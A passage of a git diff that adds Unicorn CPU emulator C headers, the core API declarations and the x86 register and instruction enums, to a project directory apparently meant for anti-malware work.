UC_HOOK_MEM_READ_PROT and UC_HOOK_MEM_READ_UNMAPPED, so +// this hook may technically trigger on some invalid reads. +#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) + +/* + Callback function for hooking memory (READ, WRITE & FETCH) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. 
+ @user_data: user data passed to tracing APIs +*/ +typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Callback function for handling invalid memory access events (UNMAPPED and + PROT events) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + + @return: return true to continue, or false to stop program (due to invalid memory). + NOTE: returning true to continue execution will only work if if the accessed + memory is made accessible with the correct permissions during the hook. + + In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, + the memory should be uc_mem_map()-ed with the correct permissions, and the + instruction will then read or write to the address as it was supposed to. + + In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped + in as executable, in which case execution will resume from the fetched address. + The instruction pointer may be written to in order to change where execution resumes, + but the fetch must succeed if execution is to resume. +*/ +typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Memory region mapped by uc_mem_map() and uc_mem_map_ptr() + Retrieve the list of memory regions with uc_mem_regions() +*/ +typedef struct uc_mem_region { + uint64_t begin; // begin address of the region (inclusive) + uint64_t end; // end address of the region (inclusive) + uint32_t perms; // memory permissions of the region +} uc_mem_region; + +// All type of queries for uc_query() API. +typedef enum uc_query_type { + // Dynamically query current hardware mode. 
+ UC_QUERY_MODE = 1, + UC_QUERY_PAGE_SIZE, // query pagesize of engine + UC_QUERY_ARCH, // query architecture of engine (for ARM to query Thumb mode) + UC_QUERY_TIMEOUT, // query if emulation stops due to timeout (indicated if result = True) +} uc_query_type; + +// Opaque storage for CPU context, used with uc_context_*() +struct uc_context; +typedef struct uc_context uc_context; + +/* + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro UC_MAKE_VERSION + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*/ +UNICORN_EXPORT +unsigned int uc_version(unsigned int *major, unsigned int *minor); + + +/* + Determine if the given architecture is supported by this library. + + @arch: architecture type (UC_ARCH_*) + + @return True if this library supports the given arch. +*/ +UNICORN_EXPORT +bool uc_arch_supported(uc_arch arch); + + +/* + Create new instance of unicorn engine. + + @arch: architecture type (UC_ARCH_*) + @mode: hardware mode. This is combined of UC_MODE_* + @uc: pointer to uc_engine, which will be updated at return time + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); + +/* + Close a Unicorn engine instance. + NOTE: this must be called only when there is no longer any + usage of @uc. This API releases some of @uc's cached memory, thus + any use of the Unicorn API with @uc after it has been closed may + crash your application. 
After this, @uc is invalid, and is no + longer usable. + + @uc: pointer to a handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_close(uc_engine *uc); + +/* + Query internal status of engine. + + @uc: handle returned by uc_open() + @type: query type. See uc_query_type + + @result: save the internal status queried + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); + +/* + Report the last error number when some API function fail. + Like glibc's errno, uc_errno might not retain its old value once accessed. + + @uc: handle returned by uc_open() + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_errno(uc_engine *uc); + +/* + Return a string describing given error code. + + @code: error code (see UC_ERR_* above) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code + */ +UNICORN_EXPORT +const char *uc_strerror(uc_err code); + +/* + Write to register. + + @uc: handle returned by uc_open() + @regid: register ID that is to be modified. + @value: pointer to the value that will set to register @regid + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); + +/* + Read register value. + + @uc: handle returned by uc_open() + @regid: register ID that is to be retrieved. + @value: pointer to a variable storing the register value. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_read(uc_engine *uc, int regid, void *value); + +/* + Write multiple register values. 
+ + @uc: handle returned by uc_open() + @regs: array of register IDs to store + @value: pointer to array of register values + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); + +/* + Read multiple register values. + + @uc: handle returned by uc_open() + @regs: array of register IDs to retrieve + @value: pointer to array of values to hold registers + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); + +/* + Write to a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to set. + @bytes: pointer to a variable containing data to be written to memory. + @size: size of memory to write to. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); + +/* + Read a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to get. + @bytes: pointer to a variable containing data copied from memory. + @size: size of memory to read. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); + +/* + Emulate machine code in a specific duration of time. 
+ + @uc: handle returned by uc_open() + @begin: address where emulation starts + @until: address where emulation stops (i.e when this address is hit) + @timeout: duration to emulate the code (in microseconds). When this value is 0, + we will emulate the code in infinite time, until the code is finished. + @count: the number of instructions to be emulated. When this value is 0, + we will emulate all the code available, until the code is finished. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); + +/* + Stop emulation (which was started by uc_emu_start() API. + This is typically called from callback functions registered via tracing APIs. + + @uc: handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_stop(uc_engine *uc); + +/* + Register callback for a hook event. + The callback will be run when the hook event is hit. + + @uc: handle returned by uc_open() + @hh: hook handle returned from this registration. To be used in uc_hook_del() API + @type: hook type + @callback: callback to be run when instruction is hit + @user_data: user-defined data. This will be passed to callback function in its + last argument @user_data + @begin: start address of the area where the callback is effect (inclusive) + @end: end address of the area where the callback is effect (inclusive) + NOTE 1: the callback is called only if related address is in range [@begin, @end] + NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered + @...: variable arguments (depending on @type) + NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). 
+*/ +UNICORN_EXPORT +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); + +/* + Unregister (remove) a hook callback. + This API removes the hook callback registered by uc_hook_add(). + NOTE: this should be called only when you no longer want to trace. + After this, @hh is invalid, and no longer usable. + + @uc: handle returned by uc_open() + @hh: handle returned by uc_hook_add() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_hook_del(uc_engine *uc, uc_hook hh); + +typedef enum uc_prot { + UC_PROT_NONE = 0, + UC_PROT_READ = 1, + UC_PROT_WRITE = 2, + UC_PROT_EXEC = 4, + UC_PROT_ALL = 7, +} uc_prot; + +/* + Map memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Map existing host memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. 
+ This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + @ptr: pointer to host memory backing the newly mapped memory. This host memory is + expected to be an equal or larger size than provided, and be mapped with at + least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); + +/* + Unmap a region of emulation memory. + This API deletes a memory mapping from the emulation memory space. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be unmapped. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); + +/* + Set memory permissions for emulation memory. + This API changes permissions on an existing memory region. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be modified. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: New permissions for the mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. 
+ + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() + This API allocates memory for @regions, and user must free this memory later + by free() to avoid leaking memory. + NOTE: memory regions may be split by uc_mem_unmap() + + @uc: handle returned by uc_open() + @regions: pointer to an array of uc_mem_region struct. This is allocated by + Unicorn, and must be freed by user later with uc_free() + @count: pointer to number of struct uc_mem_region contained in @regions + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); + +/* + Allocate a region that can be used with uc_context_{save,restore} to perform + quick save/rollback of the CPU context, which includes registers and some + internal metadata. Contexts may not be shared across engine instances with + differing arches or modes. + + @uc: handle returned by uc_open() + @context: pointer to a uc_engine*. This will be updated with the pointer to + the new context on successful return of this function. + Later, this allocated memory must be freed with uc_free(). + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_alloc(uc_engine *uc, uc_context **context); + +/* + Free the memory allocated by uc_mem_regions. + WARNING: After Unicorn 1.0.1rc5, the memory allocated by uc_context_alloc should + be freed by uc_context_free(). Calling uc_free() may still work, but the result + is **undefined**. + + @mem: memory allocated by uc_mem_regions (returned in *regions). 
+ + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_free(void *mem); + +/* + Save a copy of the internal CPU context. + This API should be used to efficiently make or update a saved copy of the + internal CPU state. + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_save(uc_engine *uc, uc_context *context); + +/* + Restore the current CPU context from a saved copy. + This API should be used to roll the CPU context back to a previous + state saved by uc_context_save(). + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc that has been used with uc_context_save + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_restore(uc_engine *uc, uc_context *context); + + +/* + Return the size needed to store the cpu context. Can be used to allocate a buffer + to contain the cpu context and directly call uc_context_save. + + @uc: handle returned by uc_open() + + @return the size needed to store the cpu context as a size_t. +*/ +UNICORN_EXPORT +size_t uc_context_size(uc_engine *uc); + + +/* + Free the context allocated by uc_context_alloc(). + + @context: handle returned by uc_context_alloc() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). 
+*/ +UNICORN_EXPORT +uc_err uc_context_free(uc_context *context); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/x86.h b/ai_anti_malware/unicorn/include/unicorn/x86.h new file mode 100644 index 0000000..cd2c66d --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/x86.h @@ -0,0 +1,1446 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_X86_H +#define UNICORN_X86_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. +// Borrow from SegmentCache in qemu/target-i386/cpu.h +typedef struct uc_x86_mmr { + uint16_t selector; /* not used by GDTR and IDTR */ + uint64_t base; /* handle 32 or 64 bit CPUs */ + uint32_t limit; + uint32_t flags; /* not used by GDTR and IDTR */ +} uc_x86_mmr; + +// Model-Specific Register structure, use this with UC_X86_REG_MSR (as the register ID) in +// call to uc_reg_write/uc_reg_read() to manipulate MSRs. +typedef struct uc_x86_msr { + uint32_t rid; // MSR id + uint64_t value; // MSR value +} uc_x86_msr; + +// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) +// @user_data: user data passed to tracing APIs. 
+typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); + +//> X86 registers +typedef enum uc_x86_reg { + UC_X86_REG_INVALID = 0, + UC_X86_REG_AH, UC_X86_REG_AL, UC_X86_REG_AX, UC_X86_REG_BH, UC_X86_REG_BL, + UC_X86_REG_BP, UC_X86_REG_BPL, UC_X86_REG_BX, UC_X86_REG_CH, UC_X86_REG_CL, + UC_X86_REG_CS, UC_X86_REG_CX, UC_X86_REG_DH, UC_X86_REG_DI, UC_X86_REG_DIL, + UC_X86_REG_DL, UC_X86_REG_DS, UC_X86_REG_DX, UC_X86_REG_EAX, UC_X86_REG_EBP, + UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDI, UC_X86_REG_EDX, UC_X86_REG_EFLAGS, + UC_X86_REG_EIP, UC_X86_REG_EIZ, UC_X86_REG_ES, UC_X86_REG_ESI, UC_X86_REG_ESP, + UC_X86_REG_FPSW, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_IP, UC_X86_REG_RAX, + UC_X86_REG_RBP, UC_X86_REG_RBX, UC_X86_REG_RCX, UC_X86_REG_RDI, UC_X86_REG_RDX, + UC_X86_REG_RIP, UC_X86_REG_RIZ, UC_X86_REG_RSI, UC_X86_REG_RSP, UC_X86_REG_SI, + UC_X86_REG_SIL, UC_X86_REG_SP, UC_X86_REG_SPL, UC_X86_REG_SS, UC_X86_REG_CR0, + UC_X86_REG_CR1, UC_X86_REG_CR2, UC_X86_REG_CR3, UC_X86_REG_CR4, UC_X86_REG_CR5, + UC_X86_REG_CR6, UC_X86_REG_CR7, UC_X86_REG_CR8, UC_X86_REG_CR9, UC_X86_REG_CR10, + UC_X86_REG_CR11, UC_X86_REG_CR12, UC_X86_REG_CR13, UC_X86_REG_CR14, UC_X86_REG_CR15, + UC_X86_REG_DR0, UC_X86_REG_DR1, UC_X86_REG_DR2, UC_X86_REG_DR3, UC_X86_REG_DR4, + UC_X86_REG_DR5, UC_X86_REG_DR6, UC_X86_REG_DR7, UC_X86_REG_DR8, UC_X86_REG_DR9, + UC_X86_REG_DR10, UC_X86_REG_DR11, UC_X86_REG_DR12, UC_X86_REG_DR13, UC_X86_REG_DR14, + UC_X86_REG_DR15, UC_X86_REG_FP0, UC_X86_REG_FP1, UC_X86_REG_FP2, UC_X86_REG_FP3, + UC_X86_REG_FP4, UC_X86_REG_FP5, UC_X86_REG_FP6, UC_X86_REG_FP7, + UC_X86_REG_K0, UC_X86_REG_K1, UC_X86_REG_K2, UC_X86_REG_K3, UC_X86_REG_K4, + UC_X86_REG_K5, UC_X86_REG_K6, UC_X86_REG_K7, UC_X86_REG_MM0, UC_X86_REG_MM1, + UC_X86_REG_MM2, UC_X86_REG_MM3, UC_X86_REG_MM4, UC_X86_REG_MM5, UC_X86_REG_MM6, + UC_X86_REG_MM7, UC_X86_REG_R8, UC_X86_REG_R9, UC_X86_REG_R10, UC_X86_REG_R11, + UC_X86_REG_R12, UC_X86_REG_R13, UC_X86_REG_R14, UC_X86_REG_R15, + 
UC_X86_REG_ST0, UC_X86_REG_ST1, UC_X86_REG_ST2, UC_X86_REG_ST3, + UC_X86_REG_ST4, UC_X86_REG_ST5, UC_X86_REG_ST6, UC_X86_REG_ST7, + UC_X86_REG_XMM0, UC_X86_REG_XMM1, UC_X86_REG_XMM2, UC_X86_REG_XMM3, UC_X86_REG_XMM4, + UC_X86_REG_XMM5, UC_X86_REG_XMM6, UC_X86_REG_XMM7, UC_X86_REG_XMM8, UC_X86_REG_XMM9, + UC_X86_REG_XMM10, UC_X86_REG_XMM11, UC_X86_REG_XMM12, UC_X86_REG_XMM13, UC_X86_REG_XMM14, + UC_X86_REG_XMM15, UC_X86_REG_XMM16, UC_X86_REG_XMM17, UC_X86_REG_XMM18, UC_X86_REG_XMM19, + UC_X86_REG_XMM20, UC_X86_REG_XMM21, UC_X86_REG_XMM22, UC_X86_REG_XMM23, UC_X86_REG_XMM24, + UC_X86_REG_XMM25, UC_X86_REG_XMM26, UC_X86_REG_XMM27, UC_X86_REG_XMM28, UC_X86_REG_XMM29, + UC_X86_REG_XMM30, UC_X86_REG_XMM31, UC_X86_REG_YMM0, UC_X86_REG_YMM1, UC_X86_REG_YMM2, + UC_X86_REG_YMM3, UC_X86_REG_YMM4, UC_X86_REG_YMM5, UC_X86_REG_YMM6, UC_X86_REG_YMM7, + UC_X86_REG_YMM8, UC_X86_REG_YMM9, UC_X86_REG_YMM10, UC_X86_REG_YMM11, UC_X86_REG_YMM12, + UC_X86_REG_YMM13, UC_X86_REG_YMM14, UC_X86_REG_YMM15, UC_X86_REG_YMM16, UC_X86_REG_YMM17, + UC_X86_REG_YMM18, UC_X86_REG_YMM19, UC_X86_REG_YMM20, UC_X86_REG_YMM21, UC_X86_REG_YMM22, + UC_X86_REG_YMM23, UC_X86_REG_YMM24, UC_X86_REG_YMM25, UC_X86_REG_YMM26, UC_X86_REG_YMM27, + UC_X86_REG_YMM28, UC_X86_REG_YMM29, UC_X86_REG_YMM30, UC_X86_REG_YMM31, UC_X86_REG_ZMM0, + UC_X86_REG_ZMM1, UC_X86_REG_ZMM2, UC_X86_REG_ZMM3, UC_X86_REG_ZMM4, UC_X86_REG_ZMM5, + UC_X86_REG_ZMM6, UC_X86_REG_ZMM7, UC_X86_REG_ZMM8, UC_X86_REG_ZMM9, UC_X86_REG_ZMM10, + UC_X86_REG_ZMM11, UC_X86_REG_ZMM12, UC_X86_REG_ZMM13, UC_X86_REG_ZMM14, UC_X86_REG_ZMM15, + UC_X86_REG_ZMM16, UC_X86_REG_ZMM17, UC_X86_REG_ZMM18, UC_X86_REG_ZMM19, UC_X86_REG_ZMM20, + UC_X86_REG_ZMM21, UC_X86_REG_ZMM22, UC_X86_REG_ZMM23, UC_X86_REG_ZMM24, UC_X86_REG_ZMM25, + UC_X86_REG_ZMM26, UC_X86_REG_ZMM27, UC_X86_REG_ZMM28, UC_X86_REG_ZMM29, UC_X86_REG_ZMM30, + UC_X86_REG_ZMM31, UC_X86_REG_R8B, UC_X86_REG_R9B, UC_X86_REG_R10B, UC_X86_REG_R11B, + UC_X86_REG_R12B, UC_X86_REG_R13B, UC_X86_REG_R14B, 
UC_X86_REG_R15B, UC_X86_REG_R8D, + UC_X86_REG_R9D, UC_X86_REG_R10D, UC_X86_REG_R11D, UC_X86_REG_R12D, UC_X86_REG_R13D, + UC_X86_REG_R14D, UC_X86_REG_R15D, UC_X86_REG_R8W, UC_X86_REG_R9W, UC_X86_REG_R10W, + UC_X86_REG_R11W, UC_X86_REG_R12W, UC_X86_REG_R13W, UC_X86_REG_R14W, UC_X86_REG_R15W, + UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR, UC_X86_REG_TR, UC_X86_REG_FPCW, + UC_X86_REG_FPTAG, + UC_X86_REG_MSR, // Model-Specific Register + UC_X86_REG_MXCSR, + UC_X86_REG_FS_BASE, // Base regs for x86_64 + UC_X86_REG_GS_BASE, + UC_X86_REG_ENDING // <-- mark the end of the list of registers +} uc_x86_reg; + +//> X86 instructions +typedef enum uc_x86_insn { + UC_X86_INS_INVALID = 0, + + UC_X86_INS_AAA, + UC_X86_INS_AAD, + UC_X86_INS_AAM, + UC_X86_INS_AAS, + UC_X86_INS_FABS, + UC_X86_INS_ADC, + UC_X86_INS_ADCX, + UC_X86_INS_ADD, + UC_X86_INS_ADDPD, + UC_X86_INS_ADDPS, + UC_X86_INS_ADDSD, + UC_X86_INS_ADDSS, + UC_X86_INS_ADDSUBPD, + UC_X86_INS_ADDSUBPS, + UC_X86_INS_FADD, + UC_X86_INS_FIADD, + UC_X86_INS_FADDP, + UC_X86_INS_ADOX, + UC_X86_INS_AESDECLAST, + UC_X86_INS_AESDEC, + UC_X86_INS_AESENCLAST, + UC_X86_INS_AESENC, + UC_X86_INS_AESIMC, + UC_X86_INS_AESKEYGENASSIST, + UC_X86_INS_AND, + UC_X86_INS_ANDN, + UC_X86_INS_ANDNPD, + UC_X86_INS_ANDNPS, + UC_X86_INS_ANDPD, + UC_X86_INS_ANDPS, + UC_X86_INS_ARPL, + UC_X86_INS_BEXTR, + UC_X86_INS_BLCFILL, + UC_X86_INS_BLCI, + UC_X86_INS_BLCIC, + UC_X86_INS_BLCMSK, + UC_X86_INS_BLCS, + UC_X86_INS_BLENDPD, + UC_X86_INS_BLENDPS, + UC_X86_INS_BLENDVPD, + UC_X86_INS_BLENDVPS, + UC_X86_INS_BLSFILL, + UC_X86_INS_BLSI, + UC_X86_INS_BLSIC, + UC_X86_INS_BLSMSK, + UC_X86_INS_BLSR, + UC_X86_INS_BOUND, + UC_X86_INS_BSF, + UC_X86_INS_BSR, + UC_X86_INS_BSWAP, + UC_X86_INS_BT, + UC_X86_INS_BTC, + UC_X86_INS_BTR, + UC_X86_INS_BTS, + UC_X86_INS_BZHI, + UC_X86_INS_CALL, + UC_X86_INS_CBW, + UC_X86_INS_CDQ, + UC_X86_INS_CDQE, + UC_X86_INS_FCHS, + UC_X86_INS_CLAC, + UC_X86_INS_CLC, + UC_X86_INS_CLD, + UC_X86_INS_CLFLUSH, + UC_X86_INS_CLFLUSHOPT, + 
UC_X86_INS_CLGI, + UC_X86_INS_CLI, + UC_X86_INS_CLTS, + UC_X86_INS_CLWB, + UC_X86_INS_CMC, + UC_X86_INS_CMOVA, + UC_X86_INS_CMOVAE, + UC_X86_INS_CMOVB, + UC_X86_INS_CMOVBE, + UC_X86_INS_FCMOVBE, + UC_X86_INS_FCMOVB, + UC_X86_INS_CMOVE, + UC_X86_INS_FCMOVE, + UC_X86_INS_CMOVG, + UC_X86_INS_CMOVGE, + UC_X86_INS_CMOVL, + UC_X86_INS_CMOVLE, + UC_X86_INS_FCMOVNBE, + UC_X86_INS_FCMOVNB, + UC_X86_INS_CMOVNE, + UC_X86_INS_FCMOVNE, + UC_X86_INS_CMOVNO, + UC_X86_INS_CMOVNP, + UC_X86_INS_FCMOVNU, + UC_X86_INS_CMOVNS, + UC_X86_INS_CMOVO, + UC_X86_INS_CMOVP, + UC_X86_INS_FCMOVU, + UC_X86_INS_CMOVS, + UC_X86_INS_CMP, + UC_X86_INS_CMPPD, + UC_X86_INS_CMPPS, + UC_X86_INS_CMPSB, + UC_X86_INS_CMPSD, + UC_X86_INS_CMPSQ, + UC_X86_INS_CMPSS, + UC_X86_INS_CMPSW, + UC_X86_INS_CMPXCHG16B, + UC_X86_INS_CMPXCHG, + UC_X86_INS_CMPXCHG8B, + UC_X86_INS_COMISD, + UC_X86_INS_COMISS, + UC_X86_INS_FCOMP, + UC_X86_INS_FCOMPI, + UC_X86_INS_FCOMI, + UC_X86_INS_FCOM, + UC_X86_INS_FCOS, + UC_X86_INS_CPUID, + UC_X86_INS_CQO, + UC_X86_INS_CRC32, + UC_X86_INS_CVTDQ2PD, + UC_X86_INS_CVTDQ2PS, + UC_X86_INS_CVTPD2DQ, + UC_X86_INS_CVTPD2PS, + UC_X86_INS_CVTPS2DQ, + UC_X86_INS_CVTPS2PD, + UC_X86_INS_CVTSD2SI, + UC_X86_INS_CVTSD2SS, + UC_X86_INS_CVTSI2SD, + UC_X86_INS_CVTSI2SS, + UC_X86_INS_CVTSS2SD, + UC_X86_INS_CVTSS2SI, + UC_X86_INS_CVTTPD2DQ, + UC_X86_INS_CVTTPS2DQ, + UC_X86_INS_CVTTSD2SI, + UC_X86_INS_CVTTSS2SI, + UC_X86_INS_CWD, + UC_X86_INS_CWDE, + UC_X86_INS_DAA, + UC_X86_INS_DAS, + UC_X86_INS_DATA16, + UC_X86_INS_DEC, + UC_X86_INS_DIV, + UC_X86_INS_DIVPD, + UC_X86_INS_DIVPS, + UC_X86_INS_FDIVR, + UC_X86_INS_FIDIVR, + UC_X86_INS_FDIVRP, + UC_X86_INS_DIVSD, + UC_X86_INS_DIVSS, + UC_X86_INS_FDIV, + UC_X86_INS_FIDIV, + UC_X86_INS_FDIVP, + UC_X86_INS_DPPD, + UC_X86_INS_DPPS, + UC_X86_INS_RET, + UC_X86_INS_ENCLS, + UC_X86_INS_ENCLU, + UC_X86_INS_ENTER, + UC_X86_INS_EXTRACTPS, + UC_X86_INS_EXTRQ, + UC_X86_INS_F2XM1, + UC_X86_INS_LCALL, + UC_X86_INS_LJMP, + UC_X86_INS_FBLD, + UC_X86_INS_FBSTP, + 
UC_X86_INS_FCOMPP, + UC_X86_INS_FDECSTP, + UC_X86_INS_FEMMS, + UC_X86_INS_FFREE, + UC_X86_INS_FICOM, + UC_X86_INS_FICOMP, + UC_X86_INS_FINCSTP, + UC_X86_INS_FLDCW, + UC_X86_INS_FLDENV, + UC_X86_INS_FLDL2E, + UC_X86_INS_FLDL2T, + UC_X86_INS_FLDLG2, + UC_X86_INS_FLDLN2, + UC_X86_INS_FLDPI, + UC_X86_INS_FNCLEX, + UC_X86_INS_FNINIT, + UC_X86_INS_FNOP, + UC_X86_INS_FNSTCW, + UC_X86_INS_FNSTSW, + UC_X86_INS_FPATAN, + UC_X86_INS_FPREM, + UC_X86_INS_FPREM1, + UC_X86_INS_FPTAN, + UC_X86_INS_FFREEP, + UC_X86_INS_FRNDINT, + UC_X86_INS_FRSTOR, + UC_X86_INS_FNSAVE, + UC_X86_INS_FSCALE, + UC_X86_INS_FSETPM, + UC_X86_INS_FSINCOS, + UC_X86_INS_FNSTENV, + UC_X86_INS_FXAM, + UC_X86_INS_FXRSTOR, + UC_X86_INS_FXRSTOR64, + UC_X86_INS_FXSAVE, + UC_X86_INS_FXSAVE64, + UC_X86_INS_FXTRACT, + UC_X86_INS_FYL2X, + UC_X86_INS_FYL2XP1, + UC_X86_INS_MOVAPD, + UC_X86_INS_MOVAPS, + UC_X86_INS_ORPD, + UC_X86_INS_ORPS, + UC_X86_INS_VMOVAPD, + UC_X86_INS_VMOVAPS, + UC_X86_INS_XORPD, + UC_X86_INS_XORPS, + UC_X86_INS_GETSEC, + UC_X86_INS_HADDPD, + UC_X86_INS_HADDPS, + UC_X86_INS_HLT, + UC_X86_INS_HSUBPD, + UC_X86_INS_HSUBPS, + UC_X86_INS_IDIV, + UC_X86_INS_FILD, + UC_X86_INS_IMUL, + UC_X86_INS_IN, + UC_X86_INS_INC, + UC_X86_INS_INSB, + UC_X86_INS_INSERTPS, + UC_X86_INS_INSERTQ, + UC_X86_INS_INSD, + UC_X86_INS_INSW, + UC_X86_INS_INT, + UC_X86_INS_INT1, + UC_X86_INS_INT3, + UC_X86_INS_INTO, + UC_X86_INS_INVD, + UC_X86_INS_INVEPT, + UC_X86_INS_INVLPG, + UC_X86_INS_INVLPGA, + 